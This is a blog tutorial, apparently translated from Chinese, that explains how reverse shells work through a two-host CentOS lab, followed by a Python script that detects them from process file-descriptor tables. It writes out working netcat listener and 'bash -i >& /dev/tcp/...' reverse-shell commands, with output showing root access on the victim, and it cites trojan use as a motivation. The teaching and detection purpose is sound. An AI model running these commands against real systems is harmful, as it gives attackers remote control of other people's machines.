Reverse shell: principle and implementation

What is a reverse shell?

A reverse shell works like this: the controlling end listens on a TCP/UDP port, the target host initiates a connection to that port, and the target's command-line input and output are forwarded to the controlling end. A reverse shell is the counterpart of standard shells such as telnet and ssh; in essence, the network roles of client and server are reversed.

 

Why use a reverse shell?

It is commonly used when the target host's firewall restricts inbound connections, when privileges are insufficient, or when the port is already occupied by something else.

Example: suppose we attack a machine and open a port on it; the attacker then connects from their own machine to the target machine (target IP:port). This is the conventional form, which we call a forward connection. Remote Desktop, web services, ssh, telnet and so on are all forward connections. So under what circumstances can a forward connection not be used?

There are the following cases:

1. A client has been infected with your trojan, but it sits inside a LAN, so you cannot connect to it directly.

2. The target machine's IP address changes dynamically, so you cannot keep control of it.

3. Because of firewall restrictions, the other machine can send requests but cannot receive them.

4. For viruses and trojans, it is unknown what the victim's network environment will be when a victim is caught or when the victim switches machines, so setting up a server and having the malicious program connect out to it actively is the best strategy.

So the reverse shell is easy to understand: the attacker sets up a server, and the program on the victim host actively connects to the attacker's server. This is called a reverse connection.

 

==============================================================

Reference:

https://www.zhihu.com/question/24503813    Zhihu: What does "reverse shell" mean? I searched online for a long time and found no explanation of the basics.

 

Reverse shell experiment

Environment: two CentOS 7.6 servers

  • Attacker (hacker): 10.201.61.194 
  • Victim (victim): 10.201.61.195 

1. The attacker listens on a port:

[root@hacker ~]# nc -lvp 6767

Ncat: Version 7.50 ( https://nmap.org/ncat )

Ncat: Listening on :::6767

Ncat: Listening on 0.0.0.0:6767

 

2. The victim generates a reverse shell:

[root@victim ~]# bash -i >& /dev/tcp/10.201.61.194/6767 0>&1

 

3. The attacker has obtained the victim's bash:

[root@hacker ~]# nc -lvp 6767

Ncat: Version 7.50 ( https://nmap.org/ncat )

Ncat: Listening on :::6767

Ncat: Listening on 0.0.0.0:6767

Ncat: Connection from 10.201.61.195.

Ncat: Connection from 10.201.61.195:46836.

[root@victim ~]#    // the attacker now has an interactive remote shell on the victim

[root@victim ~]# hostname

hostname

victim

 

Explanation:

1. nc -lvp 6767

-l listen, -v verbose (print status and error messages), -p port. nc is short for netcat; it can listen on any TCP/UDP port, and in listening mode it acts as a TCP or UDP server on the specified port.

 

2. bash -i

-i interactive, i.e. spawn an interactive shell (bash).

 

3. /dev/tcp/IP/PORT

A special device file (in Linux everything is a file). The file does not actually exist on disk; it is an interface implemented by bash itself for making network requests. Opening this file is equivalent to calling socket() and connect() to establish a socket connection, and reading from or writing to the file is equivalent to reading from or writing to that socket.

 

 

Four small tests to analyse how the reverse shell works:

(PS: note the order in which the steps are performed)

 

Test 1:

Victim side:

[root@victim ~]# bash -i > /dev/tcp/10.201.61.194/5566    // step 2
[root@victim ~]# hostname    // step 3
[root@victim ~]#

Attacker side:

[root@hacker ~]# nc -lvp 5566    // step 1

Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Listening on :::5566
Ncat: Listening on 0.0.0.0:5566
Ncat: Connection from 10.201.61.195.
Ncat: Connection from 10.201.61.195:49018.

victim      // Test 1 result: the victim's standard output is redirected to the attacker, but the attacker cannot yet control the victim.

 

Test 2:

Victim side:

[root@victim ~]# bash -i < /dev/tcp/10.201.61.194/5566    // step 2
[root@victim ~]# hostname        // Test 2 result: the victim's standard input is redirected from the attacker, but the attacker cannot see the result of the executed command.
victim

Attacker side:

[root@hacker ~]# nc -lvp 5566    // step 1
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Listening on :::5566
Ncat: Listening on 0.0.0.0:5566
Ncat: Connection from 10.201.61.195.
Ncat: Connection from 10.201.61.195:50412.
hostname    // step 3 (the attacker executes the command)

 

Test 3 :

Victim side:

[root@victim ~]# bash -i > /dev/tcp/10.201.61.194/5566 0>&1        // step 2
[root@victim ~]# hostname    // command echoed on the victim side
[root@victim ~]# id    // command echoed on the victim side
[root@victim ~]# hahaha    // command echoed on the victim side
bash: hahaha: command not found    // echoed on the victim side; the command's error output is displayed here
[root@victim ~]#

Attacker side:

[root@hacker ~]# nc -lvp 5566    // step 1
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Listening on :::5566
Ncat: Listening on 0.0.0.0:5566
Ncat: Connection from 10.201.61.195.
Ncat: Connection from 10.201.61.195:36792.
hostname    // step 3 (executed on the attacker side)
victim
id    // step 4 (executed on the attacker side)
uid=0(root) gid=0(root) groups=0(root)
hahaha    // step 5 (execute a nonexistent command)

// Test 3 result: the basic reverse shell works, but the victim's terminal still echoes the commands executed from the attacker, and the attacker cannot see the commands' error output.

 

Test 4 (combining the three tests above: standard input, standard output and standard error are all redirected to the attacker):

Victim side:

[root@victim ~]# bash -i > /dev/tcp/10.201.61.194/5566 0>&1 2>&1         // step 2. Equivalently: bash -i &> /dev/tcp/10.201.61.194/5566 0>&1  (Note: &> or >& means combined output, i.e. standard output 1 plus standard error 2)

Attacker side:

[root@hacker ~]# nc -lvp 5566    // step 1
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Listening on :::5566
Ncat: Listening on 0.0.0.0:5566
Ncat: Connection from 10.201.61.195.
Ncat: Connection from 10.201.61.195:51182.
[root@victim ~]# hostname    // step 3. Test 4 result: the attacker has an interactive remote shell on the victim, and the victim's terminal no longer shows the commands entered by the attacker ~
hostname
victim

// PS: comparing Test 4 with Test 3, redirecting standard error (2) not only delivers the error messages; it also moves the prompt and the echo of the entered commands to the attacker ~~~
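The four tests differ only in which of the shell's file descriptors 0, 1 and 2 point at the socket, and that is exactly what a defender can look for: on Linux, /proc/<pid>/fd/N resolves to "socket:[inode]" when the descriptor is a socket. The script below is an added example written for this article, not code from the original post. It classifies a process's fd table into the four test configurations, extracts the /dev/tcp or /dev/udp target from a captured command line (bash resolves these paths internally, so they only appear in command lines, shell history or audit records), and optionally walks /proc to flag interactive shells whose stdin and stdout are the same socket. The sample fd tables and the command line are constructed from the addresses used above; the shell-name filter is an assumption, added because inetd-style and socket-activated services legitimately run with their standard streams on a socket.

```python
"""Reverse-shell fd-table classifier (added example; not from the original post)."""
import os
import re
from typing import Dict, List, Optional, Tuple

# Targets of /proc/<pid>/fd/N symlinks look like 'socket:[45678]', '/dev/pts/1', 'pipe:[123]'.
SOCKET_RE = re.compile(r"^socket:\[(\d+)\]$")
# bash's virtual /dev/tcp/HOST/PORT and /dev/udp/HOST/PORT paths (nothing exists on disk).
DEVTCP_RE = re.compile(r"/dev/(tcp|udp)/([A-Za-z0-9.\-]+)/(\d{1,5})")
# Assumption: only interactive shells are of interest; daemons may legitimately use socket stdio.
SHELLS = {"bash", "sh", "dash", "zsh", "ksh"}


def socket_inode(target: str) -> Optional[str]:
    """Return the socket inode for a 'socket:[N]' target, else None."""
    m = SOCKET_RE.match(target)
    return m.group(1) if m else None


def classify_fds(fds: Dict[int, str]) -> str:
    """Map the targets of fds 0/1/2 to the four test configurations above."""
    ins = socket_inode(fds.get(0, ""))
    out = socket_inode(fds.get(1, ""))
    err = socket_inode(fds.get(2, ""))
    if ins and out and ins == out:          # 0>&1: stdin duplicated from the socket on stdout
        if err == out:                      # 2>&1 as well: everything on one socket
            return "test4: full reverse shell (stdin, stdout, stderr on one socket)"
        return "test3: stdin and stdout on one socket, stderr still on the terminal"
    if out and not ins:
        return "test1: only stdout redirected to a socket"
    if ins and not out:
        return "test2: only stdin redirected from a socket"
    if ins and out:
        return "mixed: stdin and stdout on different sockets"
    return "none: no standard stream on a socket"


def find_devtcp(cmdline: str) -> Optional[Tuple[str, str, int]]:
    """Extract (protocol, host, port) from a /dev/tcp or /dev/udp redirection, if present."""
    m = DEVTCP_RE.search(cmdline)
    return (m.group(1), m.group(2), int(m.group(3))) if m else None


def read_fds(pid: int) -> Dict[int, str]:
    """Resolve fds 0/1/2 of a live process via /proc (empty string when unreadable)."""
    fds = {}
    for fd in (0, 1, 2):
        try:
            fds[fd] = os.readlink(f"/proc/{pid}/fd/{fd}")
        except OSError:
            fds[fd] = ""
    return fds


def scan_proc() -> List[Tuple[int, str, str]]:
    """Walk /proc (Linux only) and report shells matching test 3 or test 4; empty elsewhere."""
    findings: List[Tuple[int, str, str]] = []
    if not os.path.isdir("/proc"):
        return findings
    for name in os.listdir("/proc"):
        if not name.isdigit():
            continue
        pid = int(name)
        try:
            with open(f"/proc/{pid}/comm") as f:
                comm = f.read().strip()
        except OSError:
            continue                        # process exited or not ours to inspect
        if comm not in SHELLS:
            continue
        verdict = classify_fds(read_fds(pid))
        if verdict.startswith(("test3", "test4")):
            findings.append((pid, comm, verdict))
    return findings


# Constructed sample fd tables, one per test in the post, plus a normal terminal shell.
SAMPLES = {
    "test1": {0: "/dev/pts/0", 1: "socket:[1001]", 2: "/dev/pts/0"},
    "test2": {0: "socket:[1002]", 1: "/dev/pts/0", 2: "/dev/pts/0"},
    "test3": {0: "socket:[1003]", 1: "socket:[1003]", 2: "/dev/pts/0"},
    "test4": {0: "socket:[1004]", 1: "socket:[1004]", 2: "socket:[1004]"},
    "normal": {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"},
}

if __name__ == "__main__":
    for label, table in SAMPLES.items():
        print(f"{label:6} -> {classify_fds(table)}")
    # Constructed command line using the addresses from the experiment above.
    print(find_devtcp("bash -i >& /dev/tcp/10.201.61.194/6767 0>&1"))
    for pid, comm, verdict in scan_proc():
        print(f"pid {pid} ({comm}): {verdict}")
```

Run as root on the victim during Test 4 and scan_proc() reports the bash process; during Tests 1 and 2 it reports nothing, because a shell with only one stream on a socket cannot be driven remotely. The classification compares socket inodes rather than just checking "is a socket", so a shell whose stdin and stdout happen to be two different sockets is not mistaken for the 0>&1 pattern.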

 

Summary:

This article collects some material on reverse shells and uses experiments to understand how a reverse shell works. A deeper understanding of file descriptors and redirection helps in understanding reverse shells better ~

 

==============================================================

Reference:

https://xz.aliyun.com/t/2549    Xianzhi Community: Linux reverse shell (2): the nature of reverse shells

https://www.freebuf.com/articles/system/153986.html    FreeBuf: Reverse shell command analysis and redirection

Source: www.cnblogs.com/iouwenbo/p/11277453.html